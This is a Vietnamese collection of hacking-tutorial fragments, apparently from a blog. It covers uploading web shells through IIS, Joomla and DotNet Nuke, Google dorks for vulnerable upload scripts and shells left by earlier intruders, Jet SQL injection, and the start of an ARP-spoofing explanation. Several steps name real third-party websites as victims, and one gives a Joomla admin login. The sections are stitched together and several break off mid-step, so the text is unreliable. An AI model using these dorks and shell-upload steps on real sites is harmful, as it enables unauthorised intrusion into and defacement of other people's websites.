Demo IIS Exploit

IIS Hacking là kỹ thuật hack website dễ nhất bằng cách upload shell lên hệ thống website. Hiện nay người dùng chủ yếu sử dụng hệ điều hành win 7, Vì vậy soleil sẽ chỉ demo IIS hacking trên win 7.

Bước 1: Vào My Computer, click chuột phải và chọn Add a network Location

Chọn Next

[Bài 1 - Local Attack ] Giới Thiệu Về Local Attack

    1-      Local Attack Là gi ?

Local attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. Nghĩa là tấn công vào một website có bảo mật kém chung server  với website mục tiêu. Sau đó tấn công sang website mục tiêu bằng kỹ thuật Local.

 2-      Các bước thực hiện trong local attack

-          Xác định các website chung server với site mục tiêu.

http://ip.binhvn.biz/

-          Check qua toàn bộ server, xác định site có bảo mật kém có thể tấn công bằng các hình thức:

SQLI, RLI, LFI, XSS, DNN, IIS, Bugs, padding orale….

-          Up shell lên website có bảo mật kém

-          Local sang Site mục tiêu

Dork Tìm Kiếm Shell Trên Google

Với công cụ tìm kiếm google soleil có thể tìm thấy một số lượng shell lớn trên các site đã được hacker nào đó upload lên từ trước qua một số Dork như:

"Index of /sh3llZ"

"/sh3llZ/uploadshell/uploadshell.php"

intitle:index of/sh3llZ 

http://fab-shop.com/sh3llZ/c100/ 

Một Số Bug - Dork Upload Shell

I  -  TailoredWeb SheLL Upload Vulnerability 
 

           

     1-      Google Dork : 

    "inurl:simple-upload-53.php"

     2-    Chọn victim, sẽ có link như sau:

   http://www.site.com/simple-upload-53.php

OR

  http://www.site.com/path/simple-upload-53.php

Ví dụ:

  http://www.targetms.biz/simple-upload-53.php

Kỹ Thuật Upshell Đối Với Joomla P.I

Bước 1: Loggin với quyền admin:

http://biendientu.com/administrator/

admin / soleil

Bước 2: Thiết lập định dạng file cho phép upload

 Chọn  “Cấu hình chung” / “ Hệ thống” /“Cấu hình phương tiện”

Demo Hack Web Bằng Kỹ Thuật DNN (DotNet Nuke)

Bước 1: Sử dụng google để tìm site chứa lỗ hổng DNN

:inurl:/tabid/36/language/en-US/Default.aspx

Inurl:”/portals/0” 

Bước 2: Chọn  1 victim bất kỳ, ví dụ:

http://www.citedelajoiehaiti.org/tabid/36/language/vi-VN/Default.aspx

Bước 3: Thay thế đoạn url sau:

/tabid/36/language/en-US/Default.aspx

Bằng đoạn mã url:

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Lúc đó, đường link của victim như sau:

http://www.citedelajoiehaiti.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Thông tin thu được:

Ebook Hacking

Tổng hợp ebook hacking của TGH

http://up.4share.vn/d/39080c0f0d09000d

Kho Video Học Hacking

 Tổng hợp các kho video hacking chủ yếu là SQLI, Upshell và Local Attack từ trước đến nay

http://www.mediafire.com/?pm55krbicizbc 


http://up.4share.vn/d/5e6f6b686a6e6768

http://up.4share.vn/d/2312141610121412

[Bài 1 - SQLI] Lỗi Jet

Trong bài đâu tiên vê chủ để SQLI, Soleil giới thiệu với các bạn lỗi Jet khá phổ biến


Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column


Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:

tintuc.asp?tin_ID=
chitiet.asp?ID=

Victim hôm nay soleil sẽ demo là:
 http://thanhancamera.com/news.asp?tin_ID=86 

Bước 1: Check lỗi

Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86’

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=86 ''.

/news.asp, line 16

Tấn công Man-in-the-Middle – Giả mạo ARP Cache

1- Nguyên Tắc Hoạt Động ARP Trong Môi Trường Mạng

1.1 - ARP là gì ?

ARP (Address Resolution Protocol) là phương thức phân giải địa chỉ động giữa địa chỉ lớp network và địa chỉ lớp datalink trong mô hình SOI. Quá trình thực hiện bằng cách: một thiết bị IP trong mạng gửi một gói tin broadcast đến toàn mạng yêu cầu thiết bị khác gửi trả lại địa chỉ phần cứng ( địa chỉ lớp datalink ) của mình.